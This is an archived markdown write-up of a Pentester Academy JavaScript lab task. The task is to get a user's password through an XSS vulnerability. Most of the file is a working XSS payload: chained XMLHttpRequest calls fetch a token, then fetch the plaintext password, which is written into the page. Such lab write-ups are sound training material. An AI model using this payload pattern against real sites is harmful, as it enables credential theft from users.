Skip to content
This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
48 lines (34 loc) · 3.01 KB

TASK_20.md

File metadata and controls

48 lines (34 loc) · 3.01 KB

Task 20 [Try Now]

Objectives:

  1. Find John's Password using an XSS vulnerability on this page
  2. Display the Password in the div with id "result"
  3. App stores password in Plain Text :(
  4. No Hardcoded values can be used - everything has to be figured out dynamically

So in this when I checked the source code, I found the 2 apis. Yep, again lengthy payload 🤦

Also the gettoken is in JSON

Luckily we have XMLHttpRequest.responseType which will parse the JSON string as soon as the request response body is returned 😄

So let's use the XHR and complete this task

let uid = document.querySelector("a").innerText.trim().slice(-4);

const xhr1 = new XMLHttpRequest();
xhr1.responseType = "json";

xhr1.onreadystatechange = function () {
  if (this.status == 200 && this.readyState == 4) {
    const xhr2 = new XMLHttpRequest();
    xhr2.responseType = "json";

    xhr2.onreadystatechange = function () {
      if (this.status == 200 && this.readyState == 4) {
        document.querySelector("#result").innerText = this.response.resp.password;
      }
    };
    xhr2.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/20/getpassword?token=" + this.response.params.token, true);
    xhr2.send();
  }
};
xhr1.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/20/gettoken?uid=" + uid, true);
xhr1.send();

In XHR, the parsed JSON response is accessed via XMLHttpRequest.response

For POC, Click Here